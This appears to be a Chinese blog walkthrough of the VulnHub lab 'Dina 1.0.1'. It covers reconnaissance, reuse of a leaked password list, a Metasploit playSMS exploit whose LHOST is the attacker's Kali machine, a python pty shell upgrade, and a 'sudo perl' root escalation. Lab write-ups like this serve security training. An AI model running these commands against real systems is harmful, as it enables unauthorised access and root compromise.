当前位置: 首页 > news >正文

Dina: 1.0.1靶场

下载链接:https://download.vulnhub.com/dina/Dina-1-0-1.ova

一、信息收集

靶机界面

扫描主机ip

arp-scan -l

扫描端口

nmap -p- -A 192.168.137.129

扫描目录

dirb http://192.168.137.129/

打开网站

没有太多有用信息,点击提交后会有个目录

依旧没什么有用信息

进入http://192.168.137.129/robots.txt

逐一访问试试

除了/nothing 是这个页面外,其余都是空目录,那就先从这里入手

F12查看一波源代码发现泄露了类似与密码本的东西

#my secret pass
freedom
password
helloworld!
diana
iloveroot

继续查看其他目录 /secure 打开后有个zip文件下载下来放到kali里看看

发现里面是个mp3文件

尝试解压发现需要密码,拿刚刚泄露的密码试试,发现密码是freedom

发现文件好像损坏了,那应该是还有其他用处

那就先cat 一下试试

翻译过来大概是:我在电脑方面不是太聪明..…在服务器上我总是选择简单的密码.…带有密码备份文件。

里面附带了个 uname:touhid

还有个url : /SecreTSMSgatwayLogin

那就拼接一下尝试访问

进来后发现是个登陆界面,刚刚还给了用户名,密码先试试之前找到的密码本,尝试登陆

最终发现账户和密码为

username:touhid 
password:diana

二、Getshell

进来是这样的,左上角有个 playsms 的字眼,去msf搜搜有没有相关的漏洞

msfconsole
search playsms

发现有漏洞可以利用

use 0
set rhosts 192.168.137.129	 # 目标靶机IP
set password diana
set targeturi SecreTSMSgatwayLogin	# 目标靶机文件上传的路径,这个可以在url中看出
set username touhid
set lhost 192.168.137.130	    #kali的IP
show options                       # 检查一下有没有漏下的
run                           #运行

再转为交互式的shell

shell
python -c "import pty;pty.spawn('/bin/bash')"

这样就成功getshell

三、权限提升

先看看当前用户具有root权限的操作

sudo -l

发现了这样一个 /usr/bin/perl 那就去看看有没有可提权的payload

sudo perl -e 'exec "/bin/sh";'


http://www.mrgr.cn/news/37289.html

相关文章:

  • C语言数组探秘:数据操控的艺术【下】
  • 2024年9月27日历史上的今天大事件早读
  • 预备阶段-Android逆向基础
  • 极狐GitLab 17.4 重点功能解读【八】
  • 深入理解 CompletableFuture 的底层原理
  • 四DHCP服务实验
  • MK米客方德SD NAND参考设计
  • C++实现二叉树的创建删除,dfslfs,求叶子结点个数,求叶子结点个数,求树的高度
  • 【单元测试】任务3:JUnit assertThat断言
  • ppython 实现k nearest neighbours k最近邻分类算法
  • python 实现knn sklearn K近邻分类算法
  • LeetCode //C - 387. First Unique Character in a String
  • Spring Boot 进阶- Spring Boot日志框架介绍
  • ArcGIS与ArcGIS Pro去除在线地图服务名单
  • C++:笔试题
  • 深入理解C#中的装箱与拆箱操作及其性能影响
  • 力扣经典笔试题 最小K个数 小根堆 大根堆 快速排序 一题多解
  • 硬件设计很简单?合宙低功耗4G模组Air780E—开机启动及外围电路设计
  • 代码随想录算法训练营第四四天| 1143.最长公共子序列 1035.不相交的线 53. 最大子序和 392.判断子序列
  • 大学生科技竞赛系统小程序的设计